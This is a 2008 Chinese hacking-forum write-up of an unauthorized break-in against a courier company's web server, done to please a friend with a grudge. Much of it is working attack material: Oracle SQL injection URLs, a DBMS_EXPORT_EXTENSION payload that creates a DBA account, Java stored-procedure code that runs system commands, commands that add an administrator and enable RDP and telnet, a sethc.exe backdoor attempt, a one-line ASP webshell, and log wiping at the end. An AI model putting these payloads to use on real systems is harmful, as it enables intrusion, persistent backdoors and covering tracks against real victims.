对著名快递公司的一次艰难的oracle注入

邪恶八进制 2008年06月10日 03:31 查看7654次 作者: rebeyond  【
文章分类:数据库技术

[原创]对著名快递公司的一次艰难的oracle注入

文章作者:rebeyond
信息来源:邪恶八进制信息安全团队(www.eviloctal.com

● 轻车熟路  

一个对X飞鸿有意见的亲密朋友找我说能不能把这个公司的网站给搞了,我一听公司,心想,企业站都是垃圾,好搞,便痛快答应(人品真好!),呵呵,但是后来才发现没我想像的那么简单。

站面如图:




asp的页面,啊d和google扫注入点没有,意料之中,工具误差太大!于是旁注,结果只有这一个站,然后便边开着流光扫服务器边习惯性的去站上乱逛去手工找注入点,一会的功夫出来一条链接,如图:



习惯性的单引号,如图:

 

很 明显的注入,猜测源码大体是这样的:select XX from XXX where wen='云南';而且数据库类型为oracle,顿时来了精神,很少有这种练手的机会!估计服务器配置肯定不错!由于这种类型的数据库没什么好的工具, 就直接来手工吧,那样比较刺激,据我朋友说这个公司很大,网络也很大,数据库量更是大上加大,难怪用oracle呢,所以放弃后台提权的想法!

先用 union查询确定字段数和暴一些敏感资料,提交如下url:http://211.154.103.??/server2.asp?wen=四川省' order by 20--;返回正确,说明此表字段名大于20,继续提交http://211.154.103.??/server2.asp?wen=四川省' order by 30--;仍然返回正确,经过一些列的猜测然后提交,49返回正确,50出错,确定字段为49个,然后提交以下url:http://211.154.103.??/server2.asp?wen=四川省' union select NULL,NULL,……,NULL from dual-中间省略,一共49个null,  由于union查询需要数据类型匹配,否则出错,所以这里用null而不用数字可以避免类型错误,然后提交http://211.154.103.??/server2.asp?wen=四川省'  and 1=2 union select 1,NULL,……,NULL from dual--;出错显示类型不匹配,换成http://211.154.103.??/server2.asp?wen=四川省'  and 1=2 union select '1',NULL,……,NULL from dual--;返回正确,说明第一个是字符型的,但是下面对应位置并没有显示,继续按以上方法尝试后面48个,当试到12和13时,下面对应位置显示了,如图:
 

好了,现在我们就要用下面那两个地方爆我们需要的东西,看下oracle版本,提交http://211.154.103.??/server2.asp?wen=四川省'  and 1=2 union select '1',NULL,……,'11', (select banner from sys.v_$version where rownum=1),'13'……NULL from dual--;
结果如图:



继续提交select member from v$logfile where rownum=1获得操作系统版本,
如图



确定是windows,下面查看服务器sid,提交select instance_name from v$instance

如图

 

待会远程连接要用的,下面确定下主机ip,telnet 漏洞页上显示的ip地址的1521端口,为oracle的端口, ,成功,1521开放,下面就本地架设个oracle客户端,利用oracle的那些默认帐号密码登录,尝试n次均失败告终,管理员安全意思不错,表扬 下!^.^

下面就利用oracle的内置函数SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES过滤不严的漏 洞,至于这个函数的具体漏洞形成的原因,这里就不占篇幅了,想知道的可以去我博客,对oracle不熟悉的可以跳过这一部分,继续构造提交:http://211.154.103.??/server2.asp?wen= 四川省 '%20and%20''||SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA%20AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''CREATE USER REBEYOND IDENTIFIED BY REBEYOND'''';END;'';END;--','SYS',0,'1',0)=''--;

这里讲解下,and后面把函数求逻辑或然后与空比 较,这样系统会先求函数值,便会执行我们构造在函数里的语句,这样就往数据库加了个用户名为rebeyond密码为rebeyond的用户,然后执行http://211.154.103.??/server2.asp?wen= 四川省' and ''||SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant sysdba to rebeyond'''';END;'';END;--','SYS',0,'1',0)=''--便把我们建的用户加为dba权限,下面赋予用户远程连 接权限,提交http://211.154.103.??/server2.asp?wen= 四川省' and ''||SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''GRANT CONNECT TO rebeyond'''';END;'';END;--','SYS',0,'1',0)=''--,好了,下面远程连接!

● 峰回路转
本以为建了dba权限的用户,远程连接继续拿权限就完了,但是当我以dba身份登录时却出现这个,如图:



百度
了下才知道是服务器那边配置的问题,由于是服务器端的问题,一时不好解决,就暂时先用normal方式登录,连接成功,进去去权限设置那把权限能勾的都勾上,如图:




因为我们毕竟是dba权限的,虽然没以dba方式登录,但是除了开关数据库,其他权限还是都有的,然后就是想办法提权拿服务器,虽然oracle不支持 xp_cmdshell直接执行系统命令,但是对plsql的支持是非常另人激动的,因为可以通过建立java存储过程来执行命令,注意这时建完 shell后要对数据库用户赋予对磁盘文件操作的权限(在sqlplus里执行):call dbms_java.grant_permission('REBEYOND','java.io.FilePermission','c:/a.txt','read,write');  。 cmd打开sqlplus(和oracle客户端一起安装的),输入sqlplus /nolog,然后输入connect [email=rebeyond/rebeyond@(description=(address_list=(address= (protocol=tcp)(host=211.154.103.15)(port=1521)))(connect_data= (SERVICE_NAME=ORCL]rebeyond/rebeyond@(description=(address_list= (address=(protocol=tcp)(host=211.154.103.15)(port=1521)))(connect_data= (SERVICE_NAME=ORCL[/email])));是不是用到了我们前面爆出的服务器sid呢,hoho,连接成功,下面开始执行命令,创建 java存储过程,代码如下:

java存储过程:
第一步:
create or replace and compile
java souRCe named "util"
as
import java.io.*;
import java.lang.*;
public class util extends Object
{
public static int RunThis(String args)
{
Runtime rt = Runtime.getRuntime();
int RC = -1;
try
{
Process p = rt.exec(args);
int bufSize = 4096;
BufferedInputStream bis =new BufferedInputStream(p.getInputStream(), bufSize);
int len;
byte buffer[] = new byte[bufSize];
// Echo back what the program spit out
while ((len = bis.read(buffer, 0, bufSize)) != -1)
System.out.write(buffer, 0, len);
RC = p.waitFor();
}
catch (Exception e)
{
e.printStackTrace();
RC = -1;
}
finally
{
return RC;
}
}
}

第二步:

create or replace
function RUN_CMz(p_cmd in varchar2) return number
as
language java
name 'util.RunThis(java.lang.String) return integer';

第三步:
create or replace procedure RC(p_cmd in varChar)
as
x number;
begin
x := RUN_CMz(p_cmd);
end;

创建完之后,就可以通过x := RUN_CMz(dos命令)来执行系统命令了。

建 完存储过程后系统命令执行成功, 如图

  

但是后来发现这个shell很不爽,如果遇到需要交互的命令就会卡死,刚开始想用"ftp 我的ip地址"检测下能不能执行,结果卡死,我这边防火墙也没反应,不解,后tasklist,发现ftp.exe, 确定对方不能连接外网,可能有防火墙或作了设置.

于是用ftp传马思路抛弃,打个systeninfo命令看下系统,是2003,于是打算先建个超级用户 然后开3389,执行exec :x := RUN_CMD('net user')结果卡死,猜测net被删,执行exec :x := RUN_CMD('net1 user');成功,执行exec :x := RUN_CMD('net1 user rebeyond rebeyond  /add&net1 localgroup administrators rebeyond /add');成功,下面用reg命令读下3389的状态和端口,执行exec :x := RUN_CMD('reg query "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server"');发现fDenyTSconnections值为1,说明3389关闭

于是依次执行以下语句开3389:
reg add "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWdsrdpwdTdstcp" /v PortNumber /t REG_DWORD /d 3389 /f
reg add "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
reg add "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWinStationsRDP-Tcp" /v PortNumber /t REG_DWORD /d 3389 /f

因为cmd一交互就卡死,所以加了个/f强行参数,搞定后运行mstsc连接,结果另人吐血,能连上但是却没有登录窗口,提示说什么" awgina.dll被替换成未知版本",猜测可能把3389用到的dll给删除了,因为虽然不能登录但可以连接,于是想到了替换sethc.exe,在 shell下依次执行:

exec :x :=RUN_CMD ('del c:windowssystem32sethc.exe /f')
exec :x :=RUN_CMD('del C:WINDOWSsystem32dllcachesethc.exe /f')
exec :x :=RUN_CMD('copy c:windowsexplorer.exe c:windowssystem32sethc.exe')

按五次shift后发现没替换成功,也没删除成功,推断原因只有一个,就是没权限,但是我在前面用java建shell前专门赋予了权限的,不解,百度一 番!发现赋予文件操作权限必须得以dba的方式登录,但是前面说了我们无法以dba方式登录,顿时大脑一片空白,没有写和删除权限,只有运行权限,思路一 下少了很多,继续!!忽然想到了telnet,用reg查看了下telnet服务的状态为禁用,于是执行reg add "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesTlntSvr" /v Start /t REG_DWORD /d 2 /f把telnet服务设置为自动,然后就是想办法让服务器重启开telnet。

●柳暗花明:

shell里执行rundll32.exe user.exe,restartwindows,不一会主机重启了,成功telnet,这样权限我们已经拿到了!但是要向图像界面进军,在telnet 执行netstat -an看了下端口,发现5632,熟悉提权的人应该很熟悉,这是pcanywhere的默认端口,但是怎么才能知道pcanywhere的密码呢?因为不 能连接外网,所以直接传cif文件是不可能的,于是想到了webshell!在telnet里找到站的 目录d:site,执行echo "<%eval(request("#"))%>" >d:siteguestboook.asp,访问成功,然后用海洋一句话提交大马成功如图:



跳转到pcanywhere的cif文件目录下载cif文件并破解,成功得到pcanywhere的密码,如图:



到这基本就结束了,但是pcanywhere远程很不爽,于是还是想开用3389,于是百度搜索原因,发现是3389和pcanywhere冲突的原因 并找到了解决办法,删除某个注册表项就搞定了,在pcanywhere操作就很简单了,搞定后重启服务器,连接对方3389,终于看到了熟悉的登录界面, 用前面建的用户成功登入!如图:


至此整个入侵过程宣告结束!清了下日志修补了下漏洞!闪人!睡觉!                     
责任编辑:esayr

给文章打分...

平均分:1.3(69 次)

-5 -4 -3 -2 -1 0 1 2 3 4 5
23

顶一下

发表我的见解...

  • 您的大名: 留空为匿名
  • 您的主页:
  • 您的邮箱: